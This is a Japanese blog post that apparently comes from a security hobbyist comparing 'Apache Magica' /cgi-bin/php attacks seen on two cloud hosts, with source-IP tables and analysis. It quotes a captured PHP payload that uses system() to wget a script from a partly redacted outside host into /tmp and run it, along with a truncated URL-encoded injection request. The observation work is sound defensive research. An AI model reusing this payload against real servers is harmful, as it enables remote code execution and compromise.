ニフティクラウドに来る悪い人を観察する、の取っかかり

今までこのblogでは、さくらのVPSに来る悪い人を観察していました。

が、今回、ニフティクラウドVMサーバも手配することができました。ということで2つのホスティングサーバをまたがって観察することで、アタックに何か違いが見えたりしないじゃろうか、というのをちょっと観察していきます。

とりあえず手始めに、最近猛威をふるっているマギカ攻撃をちこっと見てみます。(/cgi-bin/phpへの魔法少女アパッチ☆マギカ攻撃への注意喚起)

対象サーバ

の2つです。

ニフティクラウドは昨日起動して、とりあえずApachemod_rewriteを使って/cgi-bin/phpにアクセスが来たら500を返すようにしておきました。これでCGIPHPがインストールされていると思い込んだ悪い人のアタックが来るはずですので、tcpdumpして待ちます。

<LocationMatch "^/cgi-bin/php">
  RewriteEngine on
  RewriteRule '' '' [R=500,L]
</LocationMatch>

で、昨日起動したばかりですが、もう/cgi-bin/phpApache Magica攻撃がわらわらやってきています。ひどいですね。

/cgi-bin/php 攻撃はさくらのVPSニフティクラウドで違いは見られるか

結論から言うと、ちょっとした小ネタで差はありますが、大きな違いは見られません。さすがに攻撃者に、接続先によって色々使い分けるほどの細かい余裕は無いのでしょう。というか微妙な時間差を見ると、インターネット上の全てのIPアドレスをフルスキャンしているのではないだろうか……。

今日もいっぱい来ていた、以下のアタックをPOSTリクエストボディまで取りだして比較しました。

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C(省略)
ニフティクラウドへのアタック

2013/12/25の上記アタックのソースIPアドレスは以下でした。

IPアドレス 国名 AS
124.193.182.61 CN AS17816 China Unicom IP network China169 Guangdong province
193.49.249.160 FR AS2200 Reseau National de telecommunications pour la Technologie
46.37.23.91 IT AS31034 Aruba S.p.A.
190.101.37.176 CL AS22047 BANDA ANCHA S.A.
さくらのVPSへのアタック

2013/12/24の上記アタックのソースIPアドレスは以下でした。なぜ1日ずらしたかと言うと、12/25には全く上記のアクセスが来なかったからです。何故でしょう。謎です。私が悪いことしている人観察しているのがバレたのでしょうか。

IPアドレス 国名 AS
91.121.90.166 FR AS16276 OVH Systems
188.40.74.133 DE AS24940 Hetzner Online AG
192.151.144.234 US AS33387 DataShack, LC
50.18.192.203 US AS16509 Amazon.com, Inc.
41.162.51.242 ZA AS36937 Neotel Pty Ltd

一致するのは何か

上記の「ニフティクラウドへのアタック」と「さくらのVPSへのアタック」、これらはPOSTリクエストなので、リクエストBODYが実行しようとしているPHPスクリプトであるため重要です。tcpdumpしていたのでこれらを見てみたのですが……ぬわんと、上記ニフティクラウドの4つと、さくらのVPSへの5つは、すべて同じPOSTボディでした。

それが以下のスクリプトになります。見やすくするため改行を入れました。

<?php
 system("
  wget http://221.132.XX.XX/scen -O /tmp/sh;
  sh /tmp/sh;
  rm -rf /tmp/sh
 ");

ちなみに221.132.XX.XXは、ベトナムのVietnam Posts and Telecommunicationsというところです。既に対処されたようで、現在はダウンロードしようとすると 404 Not Foundです。

なんとなく分かること

まず、実際にダウンロードさせようとしている攻撃スクリプトが同一であることから、この攻撃は全て同一の攻撃者(攻撃組織)によるものと思われます。

攻撃者はソースIPアドレスをどう使い分けているか

それにしても攻撃元のソースIPアドレスはコロコロと変わります。しかし、ニフティクラウドに来たソースIPアドレスと、さくらのVPSに来たソースIPアドレスでは、随分と雰囲気が違います。特にさくらのVPSに来ているフランスのOVHやアメリカのDataShackはいわば「常連」なのですが、ニフティクラウドの方に来ていません。

一方、ニフティクラウドの方に来ているソースIPアドレスのASを見ると、これらが今までさくらのVPSの方に来たことはまだ無い(と思います)。

何が言いたいかと言うと、おそらく攻撃者には、ターゲットのIPアドレスによって利用するソースIPアドレスを決定する、何らかのロジックがあるのではないでしょうか。これにどういう意図があるかはちょっとよく分かりませんが。(常にランダムにすればいい気もするけど)。

終わりに

とりあえず、超さわりだけ出してみました。正月休み明けくらいに何か出せればいいかなと思います。